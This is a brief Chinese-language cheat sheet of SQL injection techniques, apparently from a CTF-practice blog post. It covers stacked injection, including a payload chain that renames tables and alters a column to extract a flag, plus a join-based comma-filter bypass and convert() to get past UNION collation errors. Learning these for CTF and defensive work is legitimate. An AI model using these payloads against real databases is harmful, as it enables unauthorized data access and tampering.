二次注入
(待补充)
堆叠注入(禁用select|update|delete|drop|insert|where)
多个语句同时执行
如:
1‘;show databases;
将words表名改为words1,1919810931114514表名改为words,将现在的words表中的flag列名改为id 然后用1’ or 1=1 #得到flag
1‘;rename tables words to words1;rename tables 1919810931114514 to words; alter table words change flag id varchar(100);#
之后利用 1‘ or ‘1‘=‘1 爆出flag
逗号过滤
如:
select 1,2 回显select 1
可通过 select * from (select 1)a join (select 2)b
数据库本身编码问题
报错:Illegal mix of collations for operation ‘UNION’
可以用convert()进行编码转换
如group_concat(convert(TABLE_NAME using gbk))
原文:https://www.cnblogs.com/secutity-zbk/p/14062995.html